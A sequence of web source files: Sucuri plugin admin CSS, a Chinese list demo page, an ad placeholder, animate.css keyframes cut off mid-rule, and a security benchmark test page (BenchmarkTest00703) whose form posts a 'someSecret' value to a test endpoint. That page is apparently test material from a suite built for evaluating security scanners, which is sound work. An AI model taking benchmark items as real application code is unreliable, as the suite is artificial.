.sucuriscan-maincontent .sucuriscan-integrity-message,
.sucuriscan-maincontent .sucuriscan-wordpress-outdated,
.sucuriscan-maincontent .sucuriscan-auditlogs{margin-top:0;margin-bottom:20px}
/* Audit Logs Styles */
.sucuriscan-maincontent .sucuriscan-auditlogs{margin-bottom:0}
.sucuriscan-auditlogs .sucuriscan-list-as-table{margin-bottom:0}
.sucuriscan-auditlogs .sucuriscan-maxper-page{text-align:right}
.sucuriscan-auditlogs .sucuriscan-label{display:inline-block;width:56px;line-height:13px}
.sucuriscan-auditlogs .sucuriscan-auditlog-success, .sucuriscan-label-added{background:#5cb85c}
.sucuriscan-auditlogs .sucuriscan-auditlog-debug{background:#c690ec}
.sucuriscan-auditlogs .sucuriscan-auditlog-info{background:#5bc0de}
.sucuriscan-auditlogs .sucuriscan-auditlog-notice{background:#428bca}
.sucuriscan-auditlogs .sucuriscan-auditlog-warning, .sucuriscan-label-modified{background:#f0ad4e}
.sucuriscan-auditlogs .sucuriscan-auditlog-error, .sucuriscan-label-removed{background:#f27d7d}
.sucuriscan-auditlogs .sucuriscan-auditlog-critical{background:#000000}
.sucuriscan-auditlogs tbody tr:hover .sucuriscan-tooltip{display:block}
.sucuriscan-auditlogs .sucuriscan-tooltip{display:none;position:absolute;width:initial;margin:-17px 0px 0px 62px}
.sucuriscan-auditlogs .sucuriscan-tooltip:before{content:' ';position:absolute;top:5px;left:-5px;border:4px solid #000;border-left:none;border-right-width:5px;border-top-color:transparent;border-bottom-color:transparent}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-success:before{border-right-color:#5cb85c}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-debug:before{border-right-color:#c690ec}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-info:before{border-right-color:#5bc0de}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-notice:before{border-right-color:#428bca}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-warning:before{border-right-color:#f0ad4e}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-error:before{border-right-color:#f27d7d}
.sucuriscan-auditlogs .sucuriscan-severity .sucuriscan-auditlog-critical:before{border-right-color:#000000}
/* Audit Report Styles */
.sucuriscan-maincontent .sucuriscan-audit-report{border-left-width:1px}
.sucuriscan-audit-report .sucuriscan-report-row{margin-bottom:10px}
.sucuriscan-audit-report .sucuriscan-report-row:last-child{margin-bottom:0}
.sucuriscan-audit-report .sucuriscan-report-chart{width:49%;border:1px solid #ddd}
.sucuriscan-audit-report .sucuriscan-report-chart h4, .sucuriscan-audit-report .sucuriscan-report-chart h5{font-weight:normal;text-align:center;margin:0}
.sucuriscan-audit-report .sucuriscan-report-chart h4{font-size:18px;margin-top:10px}
.sucuriscan-audit-report .sucuriscan-report-chart h5{font-size:12px;margin-top:5px}
.sucuriscan-maincontent .sucuriscan-audit-report .sucuriscan-inline-alert-info{margin-top:10px}
/* Integrity Styles */
.sucuriscan-status-type{display:inline-block;width:20px;background:#ddd;text-align:center;text-transform:uppercase;margin-right:10px;padding:0 3px;border:1px solid transparent;border-radius:3px}
td.sucuriscan-corefiles-warning > div{background:#f2dede;color:#a94442;border-color:#ebccd1}
.sucuriscan-maincontent .sucuriscan-corefiles .sucuriscan-label{text-transform:capitalize}
.sucuriscan-maincontent td.sucuriscan-corefiles-warning, .sucuriscan-maincontent td.sucuriscan-corefiles-warning p{margin:0;padding:0}
.sucuriscan-maincontent td.sucuriscan-corefiles-warning div{padding:10px;border-width:1px;border-style:solid}
.sucuriscan-maincontent td.sucuriscan-corefiles-warning code{font-size:12px;padding:0 5px}
.sucuriscan-maincontent .sucuriscan-integrity-message{position:relative}
.sucuriscan-maincontent .sucuriscan-integrity-message .sucuriscan-integrity-mark{position:absolute;top:1px;right:1px;background:#7ad03a;font-weight:bold;color:#fff;line-height:35px;padding:0 10px;border-left:1px solid #ddd}
.sucuriscan-maincontent .sucuriscan-ignoredfiles{margin-top:0}
.sucuriscan-maincontent .sucuriscan-modifiedfiles .sucuriscan-ellipsis{width:100px}
/* Monitoring Styles */
.sucuriscan-monitoring-settings{margin-bottom:20px}
.sucuriscan-monitoring-settings td.td-with-button{text-align:left}
.sucuriscan-monitoring-settings .sucuriscan-list-as-table{margin:0}
.sucuriscan-monitoring-apikey-form .input-text{width:85%}
.sucuriscan-monitoring-clear-cache-form{}
.sucuriscan-monitoring-logs{}
.sucuriscan-monitoring-logs .thead-with-button .button{width:65px}
.sucuriscan-monitoring-logs .thead-with-button .input-text, .sucuriscan-monitoring-logs .thead-with-button select{width:250px}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-search-form{}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-denial-types-form{}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-date-form{}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-date-form select{width:70px}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-date-form select + select{width:112px}
.sucuriscan-monitoring-logs .sucuriscan-monitoring-date-form select + select + select{width:60px}
.sucuriscan-monitoring-logs .sucuriscan-target-date{font-size:12px;color:#999;margin-right:5px}
.sucuriscan-monitoring-logs .sucuriscan-denial-type{font-size:14px}
.sucuriscan-monitoring-logs .sucuriscan-denial-type-date{font-style:italic;color:#999}
/* Monitoring AccessLog Styles */
.sucuriscan-request-summary{margin:-15px;margin-top:-3px}
.sucuriscan-request-summary td{font-size:14px}
.sucuriscan-request-summary tr td:first-child{font-weight:bold}
.sucuriscan-request-summary td+td{font-family:monospace;word-break:break-all}
/* Hardening Status */
.sucuriscan-hstatus{position:relative;margin:0 -12px;padding:10px 12px;border:1px solid transparent}
.sucuriscan-hstatus-0{background-color:#f2dede;color:#a94442;border-color:#ebccd1}
.sucuriscan-hstatus-1{background-color:#dff0d8;color:#3c763d;border-color:#d6e9c6}
.sucuriscan-hstatus-2{background-color:#dee4f2;color:#4263a9;border-color:#ccd0eb}
.sucuriscan-hstatus .button-primary, .sucuriscan-hstatus .button-secondary{position:absolute;top:5px;right:5px}
.sucuriscan-hardening .postbox .inside pre{background:#eaeaea;padding:10px}
/* Last Logins Styles */
.sucuriscan-lastlogin-outof{font-style:italic;color:#999;margin-right:10px}
.sucuriscan-admins-lastlogins .sucuriscan-ellipsis{width:170px}
.sucuriscan-admins-lastlogins td{padding:4px 8px}
.sucuriscan-lastlogins-failed{}
/* About Page */
.sucuriscan-about ul{margin-left:20px}
.sucuriscan-about ul li{list-style:initial}
.sucuriscan-about li label{font-weight:bold;vertical-align:initial}
/* API Registered Modal */
.sucuriscan-apikey-registered{}
.sucuriscan-apikey-registered .sucuriscan-pull-right{width:400px;margin-left:20px}
.sucuriscan-apikey-registered .sucuriscan-sitelogo{background-position:0 -17px;height:83px}
/* Pagination Styles */
.sucuriscan-pagination{display:inline-block;margin:0;padding:0;border-radius:4px}
.sucuriscan-pagination>li{display:inline}
.sucuriscan-pagination>li>a, .sucuriscan-pagination>li>span{position:relative;background:#fff;color:#428bca;line-height:1.42857143;text-decoration: none;float:left;margin-left:-1px;padding:6px 12px;border:1px solid #ddd}
.sucuriscan-pagination>li:first-child>a, .sucuriscan-pagination>li:first-child>span{margin-left:0;border-radius:4px 0 0 4px}
.sucuriscan-pagination>li:last-child>a, .sucuriscan-pagination>li:last-child>span{border-radius:0 4px 4px 0}
.sucuriscan-pagination>li>a.sucuriscan-pagination-active, .sucuriscan-pagination>li>a:hover{background:#0074a2;color:#fff}
/* Resetter Styles */
.sucuriscan_wpconfig_keys_updated textarea{width:100%;height:250px;background:#f5f5f5;font-family:monospace;font-size:12px;resize:vertical;margin:20px 0 0 0}
.sucuriscan-maincontent .sucuriscan-last-logins{margin-top:0}
.sucuriscan-maincontent .sucuriscan-last-logins .sucuriscan-ellipsis{width:150px;line-height:inherit}
.sucuriscan-maincontent .sucuriscan-full-textarea{width:100%;height:400px;line-height:normal;resize:vertical;padding:10px}
.sucuriscan-maincontent .sucuriscan-settings{margin-top:0}
.sucuriscan-maincontent .sucuriscan-settings form{display:inline-block}
.sucuriscan-maincontent .sucuriscan-settings select, .sucuriscan-maincontent .sucuriscan-settings .input-text{width:220px;margin:0}
.sucuriscan-maincontent .sucuriscan-settings-notifications{margin-top:0}
.sucuriscan-maincontent .sucuriscan-settings-notifications .dashicons-before:before{margin-right:5px}
.sucuriscan-maincontent .sucuriscan-settings-ignorescanning{margin-top:0}
.sucuriscan-maincontent .sucuriscan-settings-trustip{margin-top:0}
.sucuriscan-maincontent .sucuriscan-settings-heartbeat{}
.sucuriscan-maincontent .sucuriscan-wpcron-list{margin-top:0}
.sucuriscan-maincontent .sucuriscan-infosys-htaccess .inside .sucuriscan-inline-alert-updated{margin-bottom:10px}
.sucuriscan-maincontent .sucuriscan-errorlogs .inside .sucuriscan-inline-alert-error{margin-top:10px}
.sucuriscan-maincontent .sucuriscan-errorlogs-list{}
.sucuriscan-maincontent .sucuriscan-subject-formats{margin:0}
.sucuriscan-maincontent .sucuriscan-subject-formats input[type=text]{width:40%;margin-left:10px}
/* Parent Resetter: Midnight */
.admin-color-blue .wrap div.sucuriscan-setup-notice, .admin-color-blue .sucuriscan-ad:nth-child(odd){background:#e5d1ae;border-color:#d39323}
.admin-color-coffee .wrap div.sucuriscan-setup-notice, .admin-color-coffee .sucuriscan-ad:nth-child(odd){background:#e4cfbe;border-color:#b78a66}
.admin-color-ectoplasm .wrap div.sucuriscan-setup-notice, .admin-color-ectoplasm .sucuriscan-ad:nth-child(odd){background:#ccd894;border-color:#a3b745}
.admin-color-midnight .wrap div.sucuriscan-setup-notice, .admin-color-midnight .sucuriscan-ad:nth-child(odd){background:#f1b8b4;border-color:#d02a21}
.admin-color-ocean .wrap div.sucuriscan-setup-notice, .admin-color-ocean .sucuriscan-ad:nth-child(odd){background:#c6e7c8;border-color:#719a74}
.admin-color-sunrise .wrap div.sucuriscan-setup-notice, .admin-color-sunrise .sucuriscan-ad:nth-child(odd){background:#ecc2a2;border-color:#c36822}
/* 3CJS Chart styles */
.c3 svg{font:10px sans-serif}
.c3 line,.c3 path{fill:none;stroke:#000}
.c3 text{-webkit-user-select:none;-moz-user-select:none;user-select:none}
.c3-bars path,.c3-event-rect,.c3-legend-item-tile,.c3-xgrid-focus,.c3-ygrid{shape-rendering:crispEdges}
.c3-chart-arc path{stroke:#fff}
.c3-chart-arc text{fill:#fff;font-size:13px}
.c3-grid line{stroke:#aaa}
.c3-grid text{fill:#aaa}
.c3-xgrid,.c3-ygrid{stroke-dasharray:3 3}
.c3-text.c3-empty{fill:gray;font-size:2em}
.c3-line{stroke-width:1px}
.c3-circle._expanded_{stroke-width:1px;stroke:#fff}
.c3-selected-circle{fill:#fff;stroke-width:2px}
.c3-bar{stroke-width:0}
.c3-bar._expanded_{fill-opacity:.75}
.c3-chart-arcs-title{dominant-baseline:middle;font-size:1.3em}
.c3-target.c3-focused{opacity:1}
.c3-target.c3-focused path.c3-line,.c3-target.c3-focused path.c3-step{stroke-width:2px}
.c3-target.c3-defocused{opacity:.3!important}
.c3-region{fill:#4682b4;fill-opacity:.1}
.c3-brush .extent{fill-opacity:.1}
.c3-legend-item{font-size:12px}
.c3-legend-item-hidden{opacity:.15}
.c3-legend-background{opacity:.75;fill:#fff;stroke:#d3d3d3;stroke-width:1}
.c3-tooltip-container{z-index:10}
.c3-tooltip{border-collapse:collapse;border-spacing:0;background-color:#fff;empty-cells:show;-webkit-box-shadow:7px 7px 12px -9px #777;-moz-box-shadow:7px 7px 12px -9px #777;box-shadow:7px 7px 12px -9px #777}
.c3-tooltip tr{border:1px solid #CCC}
.c3-tooltip th{background-color:#aaa;font-size:14px;padding:2px 5px;text-align:left;color:#FFF}
.c3-tooltip td{font-size:13px;padding:3px 6px;background-color:#fff;border-left:1px dotted #999}
.c3-tooltip td>span{display:inline-block;width:10px;height:10px;margin-right:6px}
.c3-tooltip td.value{text-align:right}
.c3-area{stroke-width:0;opacity:.2}
.c3-chart-arcs .c3-chart-arcs-background{fill:#e0e0e0;stroke:none}
.c3-chart-arcs .c3-chart-arcs-gauge-unit{fill:#000;font-size:16px}
.c3-chart-arcs .c3-chart-arcs-gauge-max,.c3-chart-arcs .c3-chart-arcs-gauge-min{fill:#777}
.c3-chart-arc .c3-gauge-value{fill:#000}
/* Responsive Styles */
@media (max-width: 620px) {
.sucuriscan-tabs > ul li, .sucuriscan-tabs > ul li > a{display:block}
.sucuriscan-getapi-form button.button-primary{line-height:40px}
}
@media (max-width: 768px) {
.sucuriscan-wrap .sucuriscan-leftside,
.sucuriscan-wrap .sucuriscan-sidebar,
.sucuriscan-wrap .sucuriscan-footer .sucuriscan-logo,
.sucuriscan-wrap .sucuriscan-footer .sucuriscan-help{float:none}
.sucuriscan-wrap .sucuriscan-leftside, .sucuriscan-wrap .sucuriscan-sidebar{width:100%}
.sucuriscan-wrap .sucuriscan-sidebar{margin-top:20px}
.sucuriscan-wrap .sucuriscan-footer .sucuriscan-logo{display:table;margin:0 auto}
}
@media (max-width: 920px) {
.sucuriscan-wrap .sucuriscan-navbar{padding-left:0;padding-right:0}
.sucuriscan-wrap .sucuriscan-navbar .nav-tab{display:block;line-height:20px;margin:0}
.sucuriscan-wrap .sucuriscan-navbar .nav-tab:last-child{border-bottom:1px solid #ccc}
.wp-core-ui .sucuriscan-review-hero, .wp-core-ui .button.sucuriscan-review-hero{top:0;right:0;display:block;width:100%;margin:10px 0}
}
/* Old styles */
.sucuriscan-maincontent #poststuff{min-width:initial;padding-top:0}
.sucuriscan-maincontent .widefat tbody th.check-column{padding:6px 0 3px 0}
.sucuriscan-maincontent .hardening-box .primary-secondary{margin:0 0 0 10px}
.sucuriscan-maincontent .alternate{background:#f5f5f5}
.sucuriscan-maincontent hr{border:none;border-top:1px solid #999}
.sucuriscan-maincontent table td > table{background:#fff}
.sucuriscan-maincontent table td > table th{padding:4px 8px}
|
demo/_noyet/弹性行间文字/lis_2.html | tinno/tinno.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>列表</title>
<link rel="stylesheet" type="text/css" href="https://img.tenpay.com/v2/res/css/global/tid_min.css" />
<style type="text/css">
.list {margin-left: 30px;}
</style>
<body>
<ul class="list">
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">竹纤维干发帽优惠大促销仅5元</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">建行支付送50q币,网购潮品,现金券,ipod touch</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">列表内容</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">列表内容</a><span class="list-extra">2010-10-08</span></li>
</ul>
<ul class="list list-justify">
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">竹纤维干发帽优惠大促销仅5元</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">建行支付送50q币,网购潮品,现金券,ipod touch</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">列表内容</a><span class="list-extra">2010-10-08</span></li>
<li><span class="list-ico"><span class="ico-dot"><!-- 自定义图标 --></span></span><a class="list-title" href="#" title="列表内容">列表内容</a><span class="list-extra">2010-10-08</span></li>
</ul>
</body>
</html>
|
www/ad.html | xizhonghua/sinaweibohelper | <div id="google-ad">
</div>
|
src/main/webapp/hash-00/BenchmarkTest00703.html | h3xstream/Benchmark | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="/benchmark/js/jquery.min.js"></script>
<script type="text/javascript" src="/benchmark/js/js.cookie.js"></script>
<title>BenchmarkTest00703</title>
</head>
<body>
<form action="/benchmark/hash-00/BenchmarkTest00703" method="POST" id="FormBenchmarkTest00703">
<p>Please make your car selection, and edit the value to be sent [value]:</p>
<select name="BenchmarkTest00703" multiple>
<option value="someSecret" selected>Audi. [someSecret]</option>
<option value="Ford">Ford. [Ford]</option>
<option value="Opel">Opel. [Opel]</option>
<option value="Subaru">Subaru. [Subaru]</option>
</select><br/><br/>
<input type="submit" value="Submit">
</form>
</body>
</html>
|
wp-content/plugins/nextend-smart-slider-lite/includes/modules/mod_smartslider/types/default/panorama/animate.css | VyacheslavDolya/present | .nextend-cssanimations {
-webkit-animation-fill-mode: both;
-moz-animation-fill-mode: both;
-ms-animation-fill-mode: both;
-o-animation-fill-mode: both;
animation-fill-mode: both;
-webkit-animation-duration: 1s;
-moz-animation-duration: 1s;
-ms-animation-duration: 1s;
-o-animation-duration: 1s;
animation-duration: 1s;
}
.nextend-cssanimations.hinge {
-webkit-animation-duration: 2s;
-moz-animation-duration: 2s;
-ms-animation-duration: 2s;
-o-animation-duration: 2s;
animation-duration: 2s;
}
@-webkit-keyframes flip {
0% {
-webkit-transform: perspective(400px) rotateY(0);
-webkit-animation-timing-function: ease-out;
}
40% {
-webkit-transform: perspective(400px) translateZ(150px) rotateY(170deg);
-webkit-animation-timing-function: ease-out;
}
50% {
-webkit-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1);
-webkit-animation-timing-function: ease-in;
}
80% {
-webkit-transform: perspective(400px) rotateY(360deg) scale(.95);
-webkit-animation-timing-function: ease-in;
}
100% {
-webkit-transform: perspective(400px) scale(1);
-webkit-animation-timing-function: ease-in;
}
}
@-moz-keyframes flip {
0% {
-moz-transform: perspective(400px) rotateY(0);
-moz-animation-timing-function: ease-out;
}
40% {
-moz-transform: perspective(400px) translateZ(150px) rotateY(170deg);
-moz-animation-timing-function: ease-out;
}
50% {
-moz-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1);
-moz-animation-timing-function: ease-in;
}
80% {
-moz-transform: perspective(400px) rotateY(360deg) scale(.95);
-moz-animation-timing-function: ease-in;
}
100% {
-moz-transform: perspective(400px) scale(1);
-moz-animation-timing-function: ease-in;
}
}
@-o-keyframes flip {
0% {
-o-transform: perspective(400px) rotateY(0);
-o-animation-timing-function: ease-out;
}
40% {
-o-transform: perspective(400px) translateZ(150px) rotateY(170deg);
-o-animation-timing-function: ease-out;
}
50% {
-o-transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1);
-o-animation-timing-function: ease-in;
}
80% {
-o-transform: perspective(400px) rotateY(360deg) scale(.95);
-o-animation-timing-function: ease-in;
}
100% {
-o-transform: perspective(400px) scale(1);
-o-animation-timing-function: ease-in;
}
}
@keyframes flip {
0% {
transform: perspective(400px) rotateY(0);
animation-timing-function: ease-out;
}
40% {
transform: perspective(400px) translateZ(150px) rotateY(170deg);
animation-timing-function: ease-out;
}
50% {
transform: perspective(400px) translateZ(150px) rotateY(190deg) scale(1);
animation-timing-function: ease-in;
}
80% {
transform: perspective(400px) rotateY(360deg) scale(.95);
animation-timing-function: ease-in;
}
100% {
transform: perspective(400px) scale(1);
animation-timing-function: ease-in;
}
}
.flip {
-webkit-transform-style: preserve-3d;
-moz-transform-style: preserve-3d;
-o-transform-style: preserve-3d;
transform-style: preserve-3d;
-webkit-backface-visibility: visible !important;
-webkit-animation-name: flip;
-moz-backface-visibility: visible !important;
-moz-animation-name: flip;
-o-backface-visibility: visible !important;
-o-animation-name: flip;
backface-visibility: visible !important;
animation-name: flip;
}
@-webkit-keyframes flipInX {
0% {
-webkit-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
40% {
-webkit-transform: perspective(400px) rotateX(-10deg);
}
70% {
-webkit-transform: perspective(400px) rotateX(10deg);
}
100% {
-webkit-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
}
@-moz-keyframes flipInX {
0% {
-moz-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
40% {
-moz-transform: perspective(400px) rotateX(-10deg);
}
70% {
-moz-transform: perspective(400px) rotateX(10deg);
}
100% {
-moz-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
}
@-o-keyframes flipInX {
0% {
-o-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
40% {
-o-transform: perspective(400px) rotateX(-10deg);
}
70% {
-o-transform: perspective(400px) rotateX(10deg);
}
100% {
-o-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
}
@keyframes flipInX {
0% {
transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
40% {
transform: perspective(400px) rotateX(-10deg);
}
70% {
transform: perspective(400px) rotateX(10deg);
}
100% {
transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
}
.flipInX {
-webkit-backface-visibility: visible !important;
-webkit-animation-name: flipInX;
-moz-backface-visibility: visible !important;
-moz-animation-name: flipInX;
-o-backface-visibility: visible !important;
-o-animation-name: flipInX;
backface-visibility: visible !important;
animation-name: flipInX;
}
@-webkit-keyframes flipOutX {
0% {
-webkit-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
100% {
-webkit-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
}
@-moz-keyframes flipOutX {
0% {
-moz-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
100% {
-moz-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
}
@-o-keyframes flipOutX {
0% {
-o-transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
100% {
-o-transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
}
@keyframes flipOutX {
0% {
transform: perspective(400px) rotateX(0deg);
opacity: 1;
}
100% {
transform: perspective(400px) rotateX(90deg);
opacity: 0;
}
}
.flipOutX {
-webkit-animation-name: flipOutX;
-webkit-backface-visibility: visible !important;
-moz-animation-name: flipOutX;
-moz-backface-visibility: visible !important;
-o-animation-name: flipOutX;
-o-backface-visibility: visible !important;
animation-name: flipOutX;
backface-visibility: visible !important;
}
@-webkit-keyframes flipInY {
0% {
-webkit-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
40% {
-webkit-transform: perspective(400px) rotateY(-10deg);
}
70% {
-webkit-transform: perspective(400px) rotateY(10deg);
}
100% {
-webkit-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
}
@-moz-keyframes flipInY {
0% {
-moz-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
40% {
-moz-transform: perspective(400px) rotateY(-10deg);
}
70% {
-moz-transform: perspective(400px) rotateY(10deg);
}
100% {
-moz-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
}
@-o-keyframes flipInY {
0% {
-o-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
40% {
-o-transform: perspective(400px) rotateY(-10deg);
}
70% {
-o-transform: perspective(400px) rotateY(10deg);
}
100% {
-o-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
}
@keyframes flipInY {
0% {
transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
40% {
transform: perspective(400px) rotateY(-10deg);
}
70% {
transform: perspective(400px) rotateY(10deg);
}
100% {
transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
}
.flipInY {
-webkit-backface-visibility: visible !important;
-webkit-animation-name: flipInY;
-moz-backface-visibility: visible !important;
-moz-animation-name: flipInY;
-o-backface-visibility: visible !important;
-o-animation-name: flipInY;
backface-visibility: visible !important;
animation-name: flipInY;
}
@-webkit-keyframes flipOutY {
0% {
-webkit-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
100% {
-webkit-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
}
@-moz-keyframes flipOutY {
0% {
-moz-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
100% {
-moz-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
}
@-o-keyframes flipOutY {
0% {
-o-transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
100% {
-o-transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
}
@keyframes flipOutY {
0% {
transform: perspective(400px) rotateY(0deg);
opacity: 1;
}
100% {
transform: perspective(400px) rotateY(90deg);
opacity: 0;
}
}
.flipOutY {
-webkit-backface-visibility: visible !important;
-webkit-animation-name: flipOutY;
-moz-backface-visibility: visible !important;
-moz-animation-name: flipOutY;
-o-backface-visibility: visible !important;
-o-animation-name: flipOutY;
backface-visibility: visible !important;
animation-name: flipOutY;
}
@-webkit-keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
@-moz-keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
@-o-keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
@keyframes fadeIn {
0% {opacity: 0;}
100% {opacity: 1;}
}
.fadeIn {
-webkit-animation-name: fadeIn;
-moz-animation-name: fadeIn;
-o-animation-name: fadeIn;
animation-name: fadeIn;
}
@-webkit-keyframes fadeInUp {
0% {
opacity: 0;
-webkit-transform: translateY(20px);
}
100% {
opacity: 1;
-webkit-transform: translateY(0);
}
}
@-moz-keyframes fadeInUp {
0% {
opacity: 0;
-moz-transform: translateY(20px);
}
100% {
opacity: 1;
-moz-transform: translateY(0);
}
}
@-o-keyframes fadeInUp {
0% {
opacity: 0;
-o-transform: translateY(20px);
}
100% {
opacity: 1;
-o-transform: translateY(0);
}
}
@keyframes fadeInUp {
0% {
opacity: 0;
transform: translateY(20px);
}
100% {
opacity: 1;
transform: translateY(0);
}
}
.fadeInUp {
-webkit-animation-name: fadeInUp;
-moz-animation-name: fadeInUp;
-o-animation-name: fadeInUp;
animation-name: fadeInUp;
}
@-webkit-keyframes fadeInDown {
0% {
opacity: 0;
-webkit-transform: translateY(-20px);
}
100% {
opacity: 1;
-webkit-transform: translateY(0);
}
}
@-moz-keyframes fadeInDown {
0% {
opacity: 0;
-moz-transform: translateY(-20px);
}
100% {
opacity: 1;
-moz-transform: translateY(0);
}
}
@-o-keyframes fadeInDown {
0% {
opacity: 0;
-ms-transform: translateY(-20px);
}
100% {
opacity: 1;
-ms-transform: translateY(0);
}
}
@keyframes fadeInDown {
0% {
opacity: 0;
transform: translateY(-20px);
}
100% {
opacity: 1;
transform: translateY(0);
}
}
.fadeInDown {
-webkit-animation-name: fadeInDown;
-moz-animation-name: fadeInDown;
-o-animation-name: fadeInDown;
animation-name: fadeInDown;
}
@-webkit-keyframes fadeInLeft {
0% {
opacity: 0;
-webkit-transform: translateX(-20px);
}
100% {
opacity: 1;
-webkit-transform: translateX(0);
}
}
@-moz-keyframes fadeInLeft {
0% {
opacity: 0;
-moz-transform: translateX(-20px);
}
100% {
opacity: 1;
-moz-transform: translateX(0);
}
}
@-o-keyframes fadeInLeft {
0% {
opacity: 0;
-o-transform: translateX(-20px);
}
100% {
opacity: 1;
-o-transform: translateX(0);
}
}
@keyframes fadeInLeft {
0% {
opacity: 0;
transform: translateX(-20px);
}
100% {
opacity: 1;
transform: translateX(0);
}
}
.fadeInLeft {
-webkit-animation-name: fadeInLeft;
-moz-animation-name: fadeInLeft;
-o-animation-name: fadeInLeft;
animation-name: fadeInLeft;
}
@-webkit-keyframes fadeInRight {
0% {
opacity: 0;
-webkit-transform: translateX(20px);
}
100% {
opacity: 1;
-webkit-transform: translateX(0);
}
}
@-moz-keyframes fadeInRight {
0% {
opacity: 0;
-moz-transform: translateX(20px);
}
100% {
opacity: 1;
-moz-transform: translateX(0);
}
}
@-o-keyframes fadeInRight {
0% {
opacity: 0;
-o-transform: translateX(20px);
}
100% {
opacity: 1;
-o-transform: translateX(0);
}
}
@keyframes fadeInRight {
0% {
opacity: 0;
transform: translateX(20px);
}
100% {
opacity: 1;
transform: translateX(0);
}
}
.fadeInRight {
-webkit-animation-name: fadeInRight;
-moz-animation-name: fadeInRight;
-o-animation-name: fadeInRight;
animation-name: fadeInRight;
}
@-webkit-keyframes fadeInUpBig {
0% {
opacity: 0;
-webkit-transform: translateY(2000px);
}
100% {
opacity: 1;
-webkit-transform: translateY(0);
}
}
@-moz-keyframes fadeInUpBig {
0% {
opacity: 0;
-moz-transform: translateY(2000px);
}
100% {
opacity: 1;
-moz-transform: translateY(0);
}
}
@-o-keyframes fadeInUpBig {
0% {
opacity: 0;
-o-transform: translateY(2000px);
}
100% {
opacity: 1;
-o-transform: translateY(0);
}
}
@keyframes fadeInUpBig {
0% {
opacity: 0;
transform: translateY(2000px);
}
100% {
opacity: 1;
transform: translateY(0);
}
}
.fadeInUpBig {
-webkit-animation-name: fadeInUpBig;
-moz-animation-name: fadeInUpBig;
-o-animation-name: fadeInUpBig;
animation-name: fadeInUpBig;
}
@-webkit-keyframes fadeInDownBig {
0% {
opacity: 0;
-webkit-transform: translateY(-2000px);
}
100% {
opacity: 1;
-webkit-transform: translateY(0);
}
}
@-moz-keyframes fadeInDownBig {
0% {
opacity: 0;
-moz-transform: translateY(-2000px);
}
100% {
opacity: 1;
-moz-transform: translateY(0);
}
}
@-o-keyframes fadeInDownBig {
0% {
opacity: 0;
-o-transform: translateY(-2000px);
}
100% {
opacity: 1;
-o-transform: translateY(0);
}
}
@keyframes fadeInDownBig {
0% {
opacity: 0;
transform: translateY(-2000px);
}
100% {
opacity: 1;
transform: translateY(0);
}
}
.fadeInDownBig {
-webkit-animation-name: fadeInDownBig;
-moz-animation-name: fadeInDownBig;
-o-animation-name: fadeInDownBig;
animation-name: fadeInDownBig;
}
@-webkit-keyframes fadeInLeftBig {
0% {
opacity: 0;
